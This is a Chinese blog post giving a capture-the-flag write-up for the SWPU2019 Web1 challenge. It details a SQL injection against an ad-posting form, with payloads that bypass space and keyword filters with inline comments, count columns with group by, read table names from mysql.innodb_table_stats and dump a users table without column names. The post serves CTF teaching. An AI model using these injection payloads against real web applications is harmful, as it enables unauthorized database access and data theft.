[SWPU2019]Web1

[SWPU2019]Web1

打开网页是一个登录页面

Ys1oZqe8iiswaLn3RobuGlm0OlPipUwekLErnRztu4o

源代码中没有发现什么有用的信息,注册个账号进行尝试

FuXxYkHM2ZnttdSkE7APH9uP2hJeRj_Q3iBua4MkJ5U

发现admin已经被使用了,换了个用户名注册成功

zSKmrId2JUhVJlTdwO95WMx16jFrv2dGfDXg6NTVg20

点击“申请发布广告”,需要填写广告名和内容

DD38GqSDnhUP9i-LIMB1BzRvMiRcbJv9OIPpRkC3S04

使用1'测试

_0Og5NXLbgXwEGQUl7TwhVmk9HbBq8asqMQoCePS6hg

广告详情里发现报错

ZLjE-t18tO3BOS_ldP2VYNnbPdXvHxTJ1B3KPE6j3Qk

说明此处存在SQL注入点

进行测试时发现空格、or、#、--+、and等进行了过滤,目前基本可以确定注入点在这个地方,在进行注入的时候我们需要先判断列数,payload:

1'/**/group/**/by/**/n,'

n为整数(因为对or进行了过滤,导致order无法使用,因此这里才采用group by来确定列数),最终得到n为22,结果如下:

CIhT87d4_XZxfcjAWBt8sFVH_7K33xYdFhdo-Bg3Pig

确定列数之后那就要确定哪些列得信息可以进行展示,payload:

1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

最终获得2和3会显示出来,结果如下:

4xoFUfnt7wk1Gcgx4mjOdyPCzBdbJx_EpZ6X1DnPxs4

确定回显信息后那就获取基本信息,如数据库名、用户名、版本等信息,最终获得数据库名web1、用户root、数据库类型mariadb,结果如下:

1'union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

S3vMwJNIhhD9PDXnKj_ej_jrock0EosuBWXzGC-btJQ

1'union/**/select/**/1,database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

Mcy8Ou4QuH3gUmtJzNhdNJdFhxBer0B8Ml19HraN1V0

information_schema还有or,因为or被过滤,因此也无法使用。所以这里只能采用innodb_index_stats和 innodb_table_stats来进行绕过。payload:

1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='web1'&&'1'='1

获得表名字为:ads、users,结果如下:

_iFXnbXMBIgrHgcXy6-pEHnqVW33rdTaxUz2qnOUuXI

进行无列名注入获取flag值,因为没有mysql.innodb_column_stats这个方法,查不了列名

大概原理就是没有列名,那就给它取名,然后按别名正常继续注入,payload:

1'/**/union/**/select/**/1,(select/**/group_concat(c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1
1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

以上两者均可,其中group_concat(参数),对参数进行修改,访问每一个字段,结果如下:

j_AFbAWp_XjKRIwzT6wVJCrkutGPcmeC_h_jA3jbuEk

接着对以上注入进行简单讲解

首先有两个表ads,users。flag在users表第三列

select group_concat(b) from (select 1,2 as b,3 union select * from users)a

a,b为别名,可以乱取,b别名为users表第二列别名。

select 1,2,3用来判断回显,在数据库中这样会显示三列分别为1,2,3,而1,2,3就是三列列名

那select 1,2,3 union select * from users就会以1,2,3为列名查询users表中的内容了。具体原因涉及数据库底层,这里不做阐述

h_aSPIHHif367Ey3PydRZEKE2h8EMb_Y9IKBikcCX5Y

我们可以看到列名都被1,2,3替换了,这其实是他提取了表的内容,形成了新表,却没提取列名,所以我们可以用这个1,2,3去随时替换我们想要的列,例如:

select `2` from (select 1,2 union select * from user)a;后面加个a是为了给这个表弄个别名防止报错,同理如果这里``被过滤了也可以用别名替代:

select b from (select 1,2,3 as b union select * from user)a;这里就是3 as b,查的第三列

posted on 2024-04-13 16:51  跳河离去的鱼  阅读(58)  评论(0编辑  收藏  举报